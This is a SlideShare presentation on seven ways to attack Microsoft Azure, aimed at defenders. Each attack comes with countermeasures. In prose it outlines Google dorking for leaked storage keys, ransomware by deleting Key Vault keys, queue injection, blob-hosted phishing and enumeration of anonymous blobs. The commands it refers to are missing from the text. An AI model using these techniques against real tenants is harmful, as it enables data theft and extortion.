SlideShare a Scribd company logo

7 Ways To Cyberattack And Hack Azure

Download as PPTX, PDF
A
Abdul Khan

Everything and anything is hackable and vulnerable in some ways. Even with all the security governance and check points, businesses are still being cyberattacked & hacked regularly. Did you know, a public IP is attacked by a hacker after the first five minutes of life on the internet. This presentation directly explores the 7 dangerous ways to Cyberattack Azure and provides countermeasures. More importantly, provides some guidance to start protecting your business in the Cloud!

Technology
1 of 28
7 Dangerous Ways To Cyberattack Azure By Abdul khan
Author • Abdul Khan • IT Consultant based in Manchester, UK • Engineering Lead, Executive, Technologist, Architect • IT experience, within the private and public sectors (Retail, Banking, Digital, Insurance, M.O.D., HMRC, Aviation, Telecommunication, Housing Associations, Education, Travel, and Pharmaceutical companies). Excellent architectural and strong DevOps experience with proven-track record of delivering E2E, B2B and B2C solution on regional and global programs. • SME in specializing in providing integration, data migration, digital transformations to the cloud solutions (Azure and AWS) • Wealth of experience in global projects across EMEA, ASPAC and LATAM • Liked in profile https://www.linkedin.com/in/abdul-khan-uk/
Accreditations Thank you to my brother, good friends and colleagues for reviewing, adding value, sharing their vast experience and knowledge. • Samad Khan (IT Manager), specialising in enterprise solution in finance and wealth Management • Steve Lampton (IT Consultant, Cloud SME) specialising in NetOps, DevOps and SecOps
Audience Main Audience • The top cyberthreats may find a wider group of potential stakeholders who are interested in understanding the threat landscape in general or deepen their understanding to cover particular threats. • This document for decision makers, security architects, risk managers, auditors and end-users who wish to be informed about the where-about of various cyberthreats may find this material useful. Assumptions • Reader has some knowledge of cloud platforms technologies.
Content 1.0 Think Like A Hacker 1.1 Introduction 1.2 Hacker Perspective 1.3 The Top Most Dangerous Cyberattacks 1.4 Account Storage – Architecture 1.5 Account Storage – Storage Stamp 3.0 Final Thoughts 3.1 Considerations & Best Practices 2.0 Cyberattacks and Countermeasures 2.1 Attack01 – Access using account keys 2.2 Attack02 – Ransomware attack and encryption 2.3 Attack03 – Attack VMs and Disks 2.4 Attack04 – Storage Tampering attack 2.5 Attack05 – A Phishing attack 2.6 Attack06 – Attack to Blob and resource using anonymous access 2.7 Attack07 – Attacks To The Public and Private IP Addresses in Azure
1.0 Think Like A Hacker…
“everything and anything is hackable and vulnerable in some ways”
1.1 Introduction • Microsoft Azure offers many types of tool and technology to manage and handle threats and security. This can be from the classical firewall, encryption, network security group, MOMS, Security Centre, Audit Logging, GDPR and much more. • To identify the most important risks and threats and how to manage them we need to choose the right platform that provides the best features and tools. • In Cloud, any resources can be linked with security or related to hacking and should be assessed for vulnerabilities. Therefore, few basic questions that should always be asked :- • Is the functionality secure or vulnerable? • If yes, how can it be exploited and how much damage could it cause?
1.2 Hacker Perspective (1/2) • From a hacker perspective, a DNS provides very important data, this includes : • The Account name is extremely important because it is used by Azure to locate the primary storage cluster and the datacentre where the storage is located, all the requests for this account are directed to this location, an application can use a different account for different locations. • The Partition name identifies the storage node of the cluster and it is used to scale- out access to the data, the ObjectName is the specific object in the partition, the transactions are atomic and managed across the different objects inside the same PartitionName.
1.2 Hacker Perspective (2/2) • The Account Storage architecture has been organized to provide the maximum capacity and scaling, the let see the most important components and how it works. • The Storage Stamp is a cluster of N racks of storage nodes, and each rack is a separate fault domain, the challenge is to maintain the storage provisioned in production as highly utilized as possible if a rack reach lower then 70% the account is migrated in another rack • The Location Service manages the account namespace across all stamps and all the storage stamps, it is also responsible for disaster recovery and load balancing, the LS updates the DNS and allow the requests from the name https://AccountName.service.core.windows.net to that storage stamp’s virtual IP (VIP, an IP address the storage stamp exposes for external traffic).
1.3 The Top Most Dangerous Cyberattacks (1/2) • There are three most essential areas in Microsoft Azure, RBAC, Storage and Networking, everything in Azure depends on these three main pillars, and considering these areas. The 3 topmost dangerous cyberattacks, below the TOP Parade: • Privilege escalation to Azure PIM and the Global Admin Account; • Ransomware Attack; • Attack to the public and private IP addresses; • All these attacks are extremely dangerous and effective. However, the privilege escalation is the most dangerous because it can escalate a top-level, which means no more control in the entire cloud and company. • Internal attacks are much more dangerous and effective than the externals, and companies often underestimate that. Cloud is more secure than on-premise, we can rely on a much more solid infrastructure but we know cloud has weaknesses.
1.3 The Top Most Dangerous Cyberattacks (2/2) • RBAC is used to provide access to the storage account to a specific user. Hacker use this approach to obtain access storage accounts. This is a classic method used to manage the storage account by people through the Azure Portal. • There are 3 major areas of Azure, also these are the weak points, most critical and vulnerable areas for hackers to exploit, they are:- • Authentication and Authorization (Azure AD and RBAC), • Microsoft Azure Storage • Networks(Azure Infrastructure).
1.4 Account Storage - Architecture Access Blobs, Tables and Queues for Accounts Location Service DNS Front-Ends Stream Layers Stream Layers Intra-Stamp Replication Storage Stamp VIP Front-Ends Stream Layers Stream Layers Intra-Stamp Replication Storage Stamp VIP Account Management Inter-Stamp Replication https://AccountName.service.core.windows.net
1.5 Account Storage - Storage Stamps • The three layers in the Storage Stamps: • Stream Layer is like a distributed file system layer within the stamps, it understands files, called streams, and it manages how to store, replicate them and more but it doesn’t have any clue about the data or the semantics. • The Partition Layers manages and understands the high data abstraction layer (Blob, Table, Queues, and Files), caching objects, and storing objects on top of the streaming. • The Front-End layer manages the authentication and authorizations for the account though SAS token or Access Key, and it governs the relations between account and partitions.
2.0 Cyberattacks and Countermeasures
2.1 Attack01 – Access Using Account Keys Attack • Developers use account keys everywhere, they send by email, they write in the code and often they take notes in files and there are different techniques to use. • Google Dorks are used by a hacker to collect any type of information on the internet, it is a very powerful technique, especially if used is a smart way • The query will search in all Google database for any file indexed of type config, containing the world accountkey in the web sites githup.com and sourceforge.net • The githup is not a typo, google may filter some query types, using this technique you can evade them. Countermeasures • Create Azure policy to block any unauthorize key vault creation (use a dedicated AD group/user) • Set less permission privilege to the Key Vault, monitor any access and notify by email any change • Store any sensitive information in Key Vaults and force developers on using this practice. • Execute automation source code scanning with Azure DevOps
2.2 Attack02 – Ransomware Attack And Encryption Attack • Azure encrypts any data in the storage account, key requirement for certifications ISO 27001, ISO 9001, GDPR and others. But Is there a real risk of a ransomware attack in the cloud?, Answer is Yes. So what can a hacker do? Answer, there is real potentially the entire storage account, all virtual machines, and disks can be encrypt. • A hacker could achieve a privilege escalation attack to the cloud or find the account keys and access to the storage account. If this is achieved, then a hacker has different choices, One quick and very dangerous attack is on the encryption keys, an attacker is able to encrypt the entire storage account. Azure uses two mechanisms to encrypt the data: • one using the internal encryption key; • and the second is using an arbitrary key created by the customer. • Attack simulation to the encryption keys, Hacker only required a basic knowledge of Storage Account and Key Vault, a hacker can :- • To execute a privilege escalation attack to Azure, (contributor access to the resource group re required) • The attacker now will delete the key from the key vault, enter the key vault and delete the key.
2.2 Attack02 – Ransomware Attack And Encryption Countermeasures • The best option is using policies and blocks any unauthorized usage, especially creation. • Create Azure policy to block any unauthorize key vault creation (use a dedicated AD group/user) • Set less permission privilege to the Key Vault, monitor any access and notify by email any change • Use Multi-Factor Authentication in any sensitive location of the company.
2.3 Attack03 – Attack VMs and Disks Attack • Another option is encrypting the content of the storage account, for example, all disks, this is a procedure that we can achieve using Powershell and remotely Countermeasures • Create Azure policy to block any unauthorize encrypting operation (use a dedicated AD group/user) • Set less permission privilege to the resources • Use Multi-Factor Authentication in any sensitive location of the company.
2.4 Attack04 – Storage Tampering attack Attack • This is an extremely effective and dangerous attack, the hacker found the storage account keys and will execute a scan in the account, below an example to list Blobs using Azure CLI : • The attacker has now a clear idea about the content and they may will inject in the storage account-specific malicious content. The hacker could upload malicious scripts, PDF files tampered and more. • Developers and IT administrators use the queues to execute specific infrastructure tasks and execution following a specific FIFO order, the hacker could inject messages in the queue and execute arbitrary code and script. • This Azure storage tampering is usually used in conjunction with the phishing attack.
2.4 Attack04 – Storage Tampering attack Countermeasures • The prevention is the best countermeasure, we must prevent access to the resource. • Create Azure policy to block any unauthorized usage (use a dedicated AD group/user) • Set less permission privilege to the storage account and to the specific resource, monitor any access and notify by email any change • Refer to Attack01 regarding the protection of the keys • Use Multi-Factor Authentication in any sensitive location of the company.
2.5 Attack05 – A Phishing attack Attack • This is a very used attack because able to be combined in many different combinations, the concept is very simple. • trusted web site, the attacker can send email using this URL without being intercepted or blocked, and it looks a legitimate URL. The hacker can simulate an internal communication and an employee could click on the URL and open a malicious file hosted in the blob. • This is a very simple example, in the future we will examine some nasty phishing attacks using a blob storage account. Countermeasures • Robust email security solutions are actually the best option, also filtering any email containing the windows.net domain. • Educate employees about recognizing different types of phishing attacks and avoid clicking any link. • Use multi security layers, scanning email, antivirus and use the red team to test malicious attack. • Educate everybody in the companies, also the very top management. • Use Multi-Factor Authentication in any sensitive location of the company.
2.6 Attack06 – Attack To Blob And Resource Using Anonymous Access Attack • We can set the reading access type of the container and blob as anonymous. We may need to use this setting because we want to provide public access to our content, hackers use this setting for phishing attacks. • Black hats daily scan the public internet and they check the contents of these blobs by: - • Option 1 – Using Shodan - Login with a free account to Shodan.io and use the search string • Option 2 – Using scripting - This is the most productive and effective way to collect anonymous blob storages, we can use any script type technique, the concept is quite simple. • During an HTTP GET to request the anonymous blob storage responds in a different way from a private one, this is the discriminant • A program or script to created any possible combination of the account name and check for any possible public blob on the internet. The procedure is a simple representation of what criminal companies do using very high calculation power. • The program used by these companies is specifically designed to check the content and they use Artificial intelligence to quickly understand if the content can be something useful or not.
2.6 Attack06 – Attack To Blob And Resource Using Anonymous Access Countermeasures • Don’t publish any sensitive information in public storage. Important Note • The usage of public blobs can be a good honey trap, criminals will be focused on that specific area of attack, you may also put false and misleading information. • The honey trap is an interesting strategy and it can be extremely effective if well planned, we can also make the criminal think what we want and discourage them from continuing any more investigation to the company.
2.7 Attack07 – Attacks To The Public and Private IP Addresses In Azure Attack • A public IP is attacked by a hacker after the first five minutes of life on the internet, this is a standard procedure, these people are criminal organizations looking for information to use against the company and employee. You can find public IP exposed in Azure very easily. The entire Azure infrastructure can be scanned for ay public IP’s, open RDP ports with one command : . By this hacker can download the entire Azure IP range by scanning the service, these are all public information. • Never underestimate the internal threats, if a hacker penetrates a VM, he will also have access to the internal network, at least in the subnet, and if the VM is in the domain then the escalation of the damage is not measurable, it depends by the Azure experience of the hacker. Countermeasures • Option 1 – The basic solution is avoid using public IP’s and if you really need then lock it and masquerade. • Option 2 – Control the creation of new Public IP • Option 3 – Use Azure Bastion • Option 4 – Use VPN • VPN is the best option and we avoid exposure to the internet however we still need to handle the private IPs because we can face an internal attack.
3.0 Final Thoughts
3.1 Considerations & Best Practices • Centralize the security control and access using a good subscription structure and firewalling appliance. • Create a Base subscription, install ExpressRoute and firewalling and propagate the connectivity to the other subscriptions, this will give you a lot of control. • Use a proper segmentation of the network and organize your IP Schemas and VNet by Regions. • Create Azure policies and force your network rules • Use Zero trust approach and limit any access • This presentation has highlights some of the most important and dangerous attacks to the Storage Account, prevention is always the best practice and in order to achieve that we need to use Azure Policies. • Azure Policies are the first line of defense, the first opportunity to stop the attack. This is what we need to achieve, we need to stop the attack from the beginning and not in the during. • the most dangerous attack always starts from the internal, we need to make our home secure from any risk. • Don’t trust anybody, even yourself, if you are not sure about something, better ask and discuss it in the team.
- END OF DECK By Abdul Khan – https://www.linkedin.com/in/abdul-khan-uk/

Recommended

Guide to security patterns for cloud systems and data security in aws and azure
Guide to security patterns for cloud systems and data security in aws and azureGuide to security patterns for cloud systems and data security in aws and azure
Guide to security patterns for cloud systems and data security in aws and azureAbdul Khan
 
Cloud security comparisons between aws and azure
Cloud security comparisons between aws and azureCloud security comparisons between aws and azure
Cloud security comparisons between aws and azureAbdul Khan
 
Cloud Security Engineering - Tools and Techniques
Cloud Security Engineering - Tools and TechniquesCloud Security Engineering - Tools and Techniques
Cloud Security Engineering - Tools and TechniquesGokul Alex
 
Cloud Security: What you need to know about IBM SmartCloud Security
Cloud Security: What you need to know about IBM SmartCloud SecurityCloud Security: What you need to know about IBM SmartCloud Security
Cloud Security: What you need to know about IBM SmartCloud SecurityIBM Security
 
Cloud Security - Emerging Facets and Frontiers
Cloud Security - Emerging Facets and FrontiersCloud Security - Emerging Facets and Frontiers
Cloud Security - Emerging Facets and FrontiersGokul Alex
 
Data Security Essentials for Cloud Computing - JavaOne 2013
Data Security Essentials for Cloud Computing - JavaOne 2013Data Security Essentials for Cloud Computing - JavaOne 2013
Data Security Essentials for Cloud Computing - JavaOne 2013javagroup2006
 
Cloud Security & Cloud Encryption Explained
Cloud Security & Cloud Encryption ExplainedCloud Security & Cloud Encryption Explained
Cloud Security & Cloud Encryption ExplainedPorticor - The Cloud Security Experts
 
Cloud security privacy- org
Cloud security privacy- orgCloud security privacy- org
Cloud security privacy- orgDharmalingam S
 

Recommended

Guide to security patterns for cloud systems and data security in aws and azure
Guide to security patterns for cloud systems and data security in aws and azureGuide to security patterns for cloud systems and data security in aws and azure
Guide to security patterns for cloud systems and data security in aws and azureAbdul Khan
 
Cloud security comparisons between aws and azure
Cloud security comparisons between aws and azureCloud security comparisons between aws and azure
Cloud security comparisons between aws and azureAbdul Khan
 
Cloud Security Engineering - Tools and Techniques
Cloud Security Engineering - Tools and TechniquesCloud Security Engineering - Tools and Techniques
Cloud Security Engineering - Tools and TechniquesGokul Alex
 
Cloud Security: What you need to know about IBM SmartCloud Security
Cloud Security: What you need to know about IBM SmartCloud SecurityCloud Security: What you need to know about IBM SmartCloud Security
Cloud Security: What you need to know about IBM SmartCloud SecurityIBM Security
 
Cloud Security - Emerging Facets and Frontiers
Cloud Security - Emerging Facets and FrontiersCloud Security - Emerging Facets and Frontiers
Cloud Security - Emerging Facets and FrontiersGokul Alex
 
Data Security Essentials for Cloud Computing - JavaOne 2013
Data Security Essentials for Cloud Computing - JavaOne 2013Data Security Essentials for Cloud Computing - JavaOne 2013
Data Security Essentials for Cloud Computing - JavaOne 2013javagroup2006
 
Cloud Security & Cloud Encryption Explained
Cloud Security & Cloud Encryption ExplainedCloud Security & Cloud Encryption Explained
Cloud Security & Cloud Encryption ExplainedPorticor - The Cloud Security Experts
 
Cloud security privacy- org
Cloud security privacy- orgCloud security privacy- org
Cloud security privacy- orgDharmalingam S
 
Cloud security, Cloud security Access broker, CSAB's 4 pillar, deployment mode
Cloud security, Cloud security Access broker, CSAB's 4 pillar, deployment modeCloud security, Cloud security Access broker, CSAB's 4 pillar, deployment mode
Cloud security, Cloud security Access broker, CSAB's 4 pillar, deployment modeHimani Singh
 
Securing Applications in the Cloud
Securing Applications in the CloudSecuring Applications in the Cloud
Securing Applications in the CloudSecurity Innovation
 
Security on Cloud Computing
Security on Cloud Computing Security on Cloud Computing
Security on Cloud Computing Reza Pahlava
 
Security Issues of Cloud Computing
Security Issues of Cloud ComputingSecurity Issues of Cloud Computing
Security Issues of Cloud ComputingFalgun Rathod
 
Cloud security
Cloud securityCloud security
Cloud securityAdeel Javaid
 
Cloud Computing Security
Cloud Computing SecurityCloud Computing Security
Cloud Computing SecurityNithin Raj
 
Security As A Service In Cloud(SECaaS)
Security As A Service In Cloud(SECaaS)Security As A Service In Cloud(SECaaS)
Security As A Service In Cloud(SECaaS)أحلام انصارى
 
Cloud Security Governance
Cloud Security GovernanceCloud Security Governance
Cloud Security GovernanceShankar Subramaniyan
 
Cloud Security
Cloud Security Cloud Security
Cloud Security Giovanni Mazzeo
 
cloud security ppt
cloud security ppt cloud security ppt
cloud security ppt Devyani Vaidya
 
Cyber Security and Cloud Computing
Cyber Security and Cloud ComputingCyber Security and Cloud Computing
Cyber Security and Cloud ComputingKeet Sugathadasa
 
Guide to CASB Use Cases
Guide to CASB Use CasesGuide to CASB Use Cases
Guide to CASB Use CasesSachin Yadav
 
Best-Practices-Web-Usability
Best-Practices-Web-UsabilityBest-Practices-Web-Usability
Best-Practices-Web-UsabilityLarry Wilson
 
(ISC)2 CCSP - Certified Cloud Security Professional
(ISC)2 CCSP - Certified Cloud Security Professional(ISC)2 CCSP - Certified Cloud Security Professional
(ISC)2 CCSP - Certified Cloud Security ProfessionalHatem ElSahhar
 
Security issue in Cloud computing
Security issue in Cloud computingSecurity issue in Cloud computing
Security issue in Cloud computingSeema Kumari
 
Cloud university intel security
Cloud university intel securityCloud university intel security
Cloud university intel securityIngram Micro Cloud
 
Data security in cloud environment
Data security in cloud environmentData security in cloud environment
Data security in cloud environmentShivam Singh
 
Cloud security
Cloud securityCloud security
Cloud securityTushar Kayande
 
Data security in the cloud
Data security in the cloud Data security in the cloud
Data security in the cloud IBM Security
 
Cloud Security Fundamentals Webinar
Cloud Security Fundamentals WebinarCloud Security Fundamentals Webinar
Cloud Security Fundamentals WebinarJoseph Holbrook, Chief Learning Officer (CLO)
 
Threat_Modelling.pdf
Threat_Modelling.pdfThreat_Modelling.pdf
Threat_Modelling.pdfMarlboroAbyad
 
Core strategies to develop defense in depth in AWS
Core strategies to develop defense in depth in AWSCore strategies to develop defense in depth in AWS
Core strategies to develop defense in depth in AWSShane Peden
 

More Related Content

What's hot

Cloud security, Cloud security Access broker, CSAB's 4 pillar, deployment mode
Cloud security, Cloud security Access broker, CSAB's 4 pillar, deployment modeCloud security, Cloud security Access broker, CSAB's 4 pillar, deployment mode
Cloud security, Cloud security Access broker, CSAB's 4 pillar, deployment modeHimani Singh
 
Securing Applications in the Cloud
Securing Applications in the CloudSecuring Applications in the Cloud
Securing Applications in the CloudSecurity Innovation
 
Security on Cloud Computing
Security on Cloud Computing Security on Cloud Computing
Security on Cloud Computing Reza Pahlava
 
Security Issues of Cloud Computing
Security Issues of Cloud ComputingSecurity Issues of Cloud Computing
Security Issues of Cloud ComputingFalgun Rathod
 
Cloud Computing Security
Cloud Computing SecurityCloud Computing Security
Cloud Computing SecurityNithin Raj
 
Cyber Security and Cloud Computing
Cyber Security and Cloud ComputingCyber Security and Cloud Computing
Cyber Security and Cloud ComputingKeet Sugathadasa
 
Guide to CASB Use Cases
Guide to CASB Use CasesGuide to CASB Use Cases
Guide to CASB Use CasesSachin Yadav
 
Best-Practices-Web-Usability
Best-Practices-Web-UsabilityBest-Practices-Web-Usability
Best-Practices-Web-UsabilityLarry Wilson
 
(ISC)2 CCSP - Certified Cloud Security Professional
(ISC)2 CCSP - Certified Cloud Security Professional(ISC)2 CCSP - Certified Cloud Security Professional
(ISC)2 CCSP - Certified Cloud Security ProfessionalHatem ElSahhar
 
Security issue in Cloud computing
Security issue in Cloud computingSecurity issue in Cloud computing
Security issue in Cloud computingSeema Kumari
 
Cloud university intel security
Cloud university intel securityCloud university intel security
Cloud university intel securityIngram Micro Cloud
 
Data security in cloud environment
Data security in cloud environmentData security in cloud environment
Data security in cloud environmentShivam Singh
 
Data security in the cloud
Data security in the cloud Data security in the cloud
Data security in the cloud IBM Security
 

What's hot (20)

Cloud security, Cloud security Access broker, CSAB's 4 pillar, deployment mode
Cloud security, Cloud security Access broker, CSAB's 4 pillar, deployment modeCloud security, Cloud security Access broker, CSAB's 4 pillar, deployment mode
Cloud security, Cloud security Access broker, CSAB's 4 pillar, deployment mode
 
Securing Applications in the Cloud
Securing Applications in the CloudSecuring Applications in the Cloud
Securing Applications in the Cloud
 
Security on Cloud Computing
Security on Cloud Computing Security on Cloud Computing
Security on Cloud Computing
 
Security Issues of Cloud Computing
Security Issues of Cloud ComputingSecurity Issues of Cloud Computing
Security Issues of Cloud Computing
 
Cloud security
Cloud securityCloud security
Cloud security
 
Cloud Computing Security
Cloud Computing SecurityCloud Computing Security
Cloud Computing Security
 
Security As A Service In Cloud(SECaaS)
Security As A Service In Cloud(SECaaS)Security As A Service In Cloud(SECaaS)
Security As A Service In Cloud(SECaaS)
 
Cloud Security Governance
Cloud Security GovernanceCloud Security Governance
Cloud Security Governance
 
Cloud Security
Cloud Security Cloud Security
Cloud Security
 
cloud security ppt
cloud security ppt cloud security ppt
cloud security ppt
 
Cyber Security and Cloud Computing
Cyber Security and Cloud ComputingCyber Security and Cloud Computing
Cyber Security and Cloud Computing
 
Guide to CASB Use Cases
Guide to CASB Use CasesGuide to CASB Use Cases
Guide to CASB Use Cases
 
Best-Practices-Web-Usability
Best-Practices-Web-UsabilityBest-Practices-Web-Usability
Best-Practices-Web-Usability
 
(ISC)2 CCSP - Certified Cloud Security Professional
(ISC)2 CCSP - Certified Cloud Security Professional(ISC)2 CCSP - Certified Cloud Security Professional
(ISC)2 CCSP - Certified Cloud Security Professional
 
Security issue in Cloud computing
Security issue in Cloud computingSecurity issue in Cloud computing
Security issue in Cloud computing
 
Cloud university intel security
Cloud university intel securityCloud university intel security
Cloud university intel security
 
Data security in cloud environment
Data security in cloud environmentData security in cloud environment
Data security in cloud environment
 
Cloud security
Cloud securityCloud security
Cloud security
 
Data security in the cloud
Data security in the cloud Data security in the cloud
Data security in the cloud
 
Cloud Security Fundamentals Webinar
Cloud Security Fundamentals WebinarCloud Security Fundamentals Webinar
Cloud Security Fundamentals Webinar
 

Similar to 7 Ways To Cyberattack And Hack Azure

Threat_Modelling.pdf
Threat_Modelling.pdfThreat_Modelling.pdf
Threat_Modelling.pdfMarlboroAbyad
 
Core strategies to develop defense in depth in AWS
Core strategies to develop defense in depth in AWSCore strategies to develop defense in depth in AWS
Core strategies to develop defense in depth in AWSShane Peden
 
001 - Get acquainted with the AWS platform -- hide01.ir.pptx
001 - Get acquainted with the AWS platform -- hide01.ir.pptx001 - Get acquainted with the AWS platform -- hide01.ir.pptx
001 - Get acquainted with the AWS platform -- hide01.ir.pptxnitinscribd
 
Creating a fortress in your active directory environment
Creating a fortress in your active directory environmentCreating a fortress in your active directory environment
Creating a fortress in your active directory environmentDavid Rowe
 
Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014Akash Mahajan
 
DBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptxDBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptxsiti829412
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecLalit Kale
 
BSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopAjay Choudhary
 
Enumeration and system hacking
Enumeration and system hackingEnumeration and system hacking
Enumeration and system hackingbegmohsin
 
Využijte svou Oracle databázi na maximum!
Využijte svou Oracle databázi na maximum!Využijte svou Oracle databázi na maximum!
Využijte svou Oracle databázi na maximum!MarketingArrowECS_CZ
 
AWS Summit 2013 | India - Extend your Datacenter in the Cloud and achieve Hig...
AWS Summit 2013 | India - Extend your Datacenter in the Cloud and achieve Hig...AWS Summit 2013 | India - Extend your Datacenter in the Cloud and achieve Hig...
AWS Summit 2013 | India - Extend your Datacenter in the Cloud and achieve Hig...Amazon Web Services
 
Webinar Fondazione CRUI - Microsoft: La Cyber Security nelle Università
Webinar Fondazione CRUI - Microsoft: La Cyber Security nelle Università Webinar Fondazione CRUI - Microsoft: La Cyber Security nelle Università
Webinar Fondazione CRUI - Microsoft: La Cyber Security nelle Università Jürgen Ambrosi
 
Active Directory 2019 v2.pptx
Active Directory 2019 v2.pptxActive Directory 2019 v2.pptx
Active Directory 2019 v2.pptxPradeep Kapkoti
 
SC-900 Concepts of Security, Compliance, and Identity
SC-900 Concepts of Security, Compliance, and IdentitySC-900 Concepts of Security, Compliance, and Identity
SC-900 Concepts of Security, Compliance, and IdentityFredBrandonAuthorMCP
 
Challenges with Cloud Security by Ken Y Chan
Challenges with Cloud Security by Ken Y ChanChallenges with Cloud Security by Ken Y Chan
Challenges with Cloud Security by Ken Y ChanKen Chan
 
Platform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building BetterPlatform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building BetterEqual Experts
 

Similar to 7 Ways To Cyberattack And Hack Azure (20)

Threat_Modelling.pdf
Threat_Modelling.pdfThreat_Modelling.pdf
Threat_Modelling.pdf
 
Core strategies to develop defense in depth in AWS
Core strategies to develop defense in depth in AWSCore strategies to develop defense in depth in AWS
Core strategies to develop defense in depth in AWS
 
AWS Cloud Security
AWS Cloud SecurityAWS Cloud Security
AWS Cloud Security
 
001 - Get acquainted with the AWS platform -- hide01.ir.pptx
001 - Get acquainted with the AWS platform -- hide01.ir.pptx001 - Get acquainted with the AWS platform -- hide01.ir.pptx
001 - Get acquainted with the AWS platform -- hide01.ir.pptx
 
Anatomy of a Cloud Hack
Anatomy of a Cloud HackAnatomy of a Cloud Hack
Anatomy of a Cloud Hack
 
Creating a fortress in your active directory environment
Creating a fortress in your active directory environmentCreating a fortress in your active directory environment
Creating a fortress in your active directory environment
 
Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014
 
DBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptxDBMS Vulnerabilities And Threats.pptx
DBMS Vulnerabilities And Threats.pptx
 
For Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSecFor Business's Sake, Let's focus on AppSec
For Business's Sake, Let's focus on AppSec
 
BSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming WorkshopBSides SG Practical Red Teaming Workshop
BSides SG Practical Red Teaming Workshop
 
Enumeration and system hacking
Enumeration and system hackingEnumeration and system hacking
Enumeration and system hacking
 
Využijte svou Oracle databázi na maximum!
Využijte svou Oracle databázi na maximum!Využijte svou Oracle databázi na maximum!
Využijte svou Oracle databázi na maximum!
 
Security Design Principles.ppt
Security Design Principles.ppt Security Design Principles.ppt
Security Design Principles.ppt
 
AWS Summit 2013 | India - Extend your Datacenter in the Cloud and achieve Hig...
AWS Summit 2013 | India - Extend your Datacenter in the Cloud and achieve Hig...AWS Summit 2013 | India - Extend your Datacenter in the Cloud and achieve Hig...
AWS Summit 2013 | India - Extend your Datacenter in the Cloud and achieve Hig...
 
Webinar Fondazione CRUI - Microsoft: La Cyber Security nelle Università
Webinar Fondazione CRUI - Microsoft: La Cyber Security nelle Università Webinar Fondazione CRUI - Microsoft: La Cyber Security nelle Università
Webinar Fondazione CRUI - Microsoft: La Cyber Security nelle Università
 
Active Directory 2019 v2.pptx
Active Directory 2019 v2.pptxActive Directory 2019 v2.pptx
Active Directory 2019 v2.pptx
 
SC-900 Concepts of Security, Compliance, and Identity
SC-900 Concepts of Security, Compliance, and IdentitySC-900 Concepts of Security, Compliance, and Identity
SC-900 Concepts of Security, Compliance, and Identity
 
Cloud Security
Cloud SecurityCloud Security
Cloud Security
 
Challenges with Cloud Security by Ken Y Chan
Challenges with Cloud Security by Ken Y ChanChallenges with Cloud Security by Ken Y Chan
Challenges with Cloud Security by Ken Y Chan
 
Platform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building BetterPlatform Security IRL: Busting Buzzwords & Building Better
Platform Security IRL: Busting Buzzwords & Building Better
 

Recently uploaded

Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfHyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdf
Hyperautomation and AI/ML: A Strategy for Digital Transformation Success.pdfPrecisely
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
How to write a Business Continuity Plan
How to write a Business Continuity PlanHow to write a Business Continuity Plan
How to write a Business Continuity PlanDatabarracks
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Streamlining Python Development: A Guide to a Modern Project Setup
